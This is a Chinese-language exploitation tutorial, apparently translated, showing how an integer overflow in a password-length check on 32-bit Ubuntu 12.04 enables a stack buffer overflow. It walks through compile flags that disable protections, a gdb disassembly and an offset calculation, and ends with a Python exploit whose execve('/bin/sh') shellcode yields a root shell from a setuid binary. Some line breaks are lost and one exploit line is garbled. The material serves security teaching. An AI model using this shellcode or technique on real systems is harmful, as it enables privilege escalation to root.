整数溢出
虚拟机安装:Ubuntu 12.04(x86)
什么是整数溢出?
存储大于最大支持值的值称为整数溢出。整数溢出本身不会导致任意代码执行,但整数溢出可能会导致堆栈溢出或堆溢出,这可能导致任意代码执行。在这篇文章中,我将仅谈论整数溢出导致堆栈溢出,整数溢出导致堆溢出将在后面的单独的帖子中讨论。
数据类型大小及范围:
当我们试图存储一个大于最大支持值的值时,我们的值会被包装 。例如,当我们尝试将存储到带符号的int数据类型时,它将被包装并存储为-21471483648。这被称为整数溢出,这种溢出可能导致任意代码执行
整数下溢
漏洞代码:
编译命令
#echo 0 > /proc/sys/kernel/randomize_va_space$gcc -g -fno-stack-protector -z execstack -o vuln vuln.c$sudo chown root vuln$sudo chgrp root vuln$sudo chmod +s vuln
上述漏洞代码的[1]行显示了一个整数溢出错误。strlen的返回类型是size_t(unsigned int),它存储在unsigned char数据类型中。因此,任何大于unsigned char的最大支持值的值都会导致整数溢出。因此当密码长度为261时,261将被包裹并存储为passwd_len变量中的5!由于这个整数溢出,可以绕过行[2]执行的边界检查,从而导致基于堆栈的缓冲区溢出!而且在这篇文章中看到,基于堆栈的缓冲区溢出导致任意的代码执行。
在研究漏洞代码之前,为了更好的理解,我们可以反汇编并绘制出漏洞代码的堆栈布局!
反汇编:
(gdb) disassemble validate_passwdDump of assembler code for function validate_passwd://Function Prologue0x0804849e <+0>: push %ebp //backup caller's ebp0x0804849f <+1>: mov %esp,%ebp //set callee's ebp to esp0x080484a1 <+3>: push %edi //backup edi0x080484a2 <+4>: sub $0x34,%esp //stack space for local variables0x080484a5 <+7>: mov 0x8(%ebp),%eax //eax = passwd0x080484a8 <+10>: movl $0xffffffff,-0x1c(%ebp) //String Length Calculation -- Begins here0x080484af <+17>: mov %eax,%edx0x080484b1 <+19>: mov $0x0,%eax0x080484b6 <+24>: mov -0x1c(%ebp),%ecx0x080484b9 <+27>: mov %edx,%edi0x080484bb <+29>: repnz scas %es:(%edi),%al0x080484bd <+31>: mov %ecx,%eax0x080484bf <+33>: not %eax0x080484c1 <+35>: sub $0x1,%eax //String Length Calculation -- Ends here0x080484c4 <+38>: mov %al,-0x9(%ebp) //passwd_len = al0x080484c7 <+41>: cmpb $0x3,-0x9(%ebp) //if(passwd_len <= 4 )0x080484cb <+45>: jbe 0x8048500 <validate_passwd+98> //jmp to 0x80485000x080484cd <+47>: cmpb $0x8,-0x9(%ebp) //if(passwd_len >=8)0x080484d1 <+51>: ja 0x8048500 <validate_passwd+98> //jmp to 0x80485000x080484da <+60>: call 0x80483a0 <puts@plt> //call puts0x080484e4 <+70>: mov %eax,(%esp) //arg = stdout0x080484e7 <+73>: call 0x8048380 <fflush@plt> //call fflush0x080484ec <+78>: mov 0x8(%ebp),%eax //eax = passwd0x080484ef <+81>: mov %eax,0x4(%esp) //arg2 = passwd0x080484f3 <+85>: lea -0x14(%ebp),%eax //eax = passwd_buf0x080484f6 <+88>: mov %eax,(%esp) //arg1 = passwd_buf0x080484f9 <+91>: call 0x8048390 <strcpy@plt> //call strcpy0x080484fe <+96>: jmp 0x8048519 <validate_passwd+123> //jmp to 0x80485190x08048500 <+98>: movl $0x804866f,(%esp) //arg = format string "Invalid Password"0x08048507 <+105>: call 0x80483a0 <puts@plt> //call puts0x0804850c <+110>: mov 0x804a020,%eax //eax = stdout0x08048511 <+115>: mov %eax,(%esp) //arg = stdout0x08048514 <+118>: call 0x8048380 <fflush@plt> //fflush0x08048519 <+123>: lea -0x14(%ebp),%eax //eax = passwd_buf0x0804851c <+126>: mov %eax,(%esp) //arg = passwd_buf0x0804851f <+129>: call 0x8048494 //call store_passwd_indb//Function Epilogue0x08048524 <+134>: add $0x34,%esp //unwind stack space0x08048527 <+137>: pop %edi //restore edi0x08048528 <+138>: pop %ebp //restore ebp0x08048529 <+139>: ret //returnEnd of assembler dump.(gdb)
堆栈布局:

由于我们已经知道长度为261的密码,所以绕过边界检查,并允许我们覆盖堆栈中的返回地址。让我们通过发送一系列的A来测试它。
测试步骤2:目的缓冲区的偏移量是多少?
这里让我们从缓冲区passwd_buf中找出什么偏移返回地址。反汇编并绘制了validate_passwd的堆栈布局,现在可以尝试找到偏移位置信息!堆栈布局显示返回地址位于缓冲区passwd_buf的偏移(0x18)处。0x18计算如下:
0x18 = 0xb + 0x1 + 0x4 + 0x4 + 0x4
其中
0xb is ‘passwd_buf’ size0x1 is ‘passwd_len’ size0x4 is alignment space0x4 is edi0x4 is caller’s EBP
因此,用户输入的,以A覆盖passwd_buf,passwd_len,对齐空间,edi和调用者的ebp,以BBBB覆盖返回地址,以C覆盖剩余空间.
以上输出显示攻击者可以控制返回地址。位于堆栈位置(0xbffff1fc)的返回地址被BBBB覆盖。有了这些信息,我们可以编写一个漏洞利用程序来实现任意的代码执行。
利用代码:
#!/usr/bin/env pythonimport structfrom subprocess import callarg1 = "sploitfun"#Stack address where shellcode is copied.ret_addr = 0xbffff274#Spawn a shell#execve(/bin/sh)scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"#endianess convertiondef conv(num):return struct.pack("<I",numunk + RA + NOP's + Shellcodearg2 = "A" * 24arg2 += conv(ret_addr);arg2 += "\x90" * 100arg2 += scodearg2 += "C" * 108print "Calling vulnerable program"call(["./vuln", arg1, arg2])
执行上面的exploit程序,给我们root shell(如下所示):
$ python exp.pyCalling vulnerable programValid Password# iduid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)# exit
参考

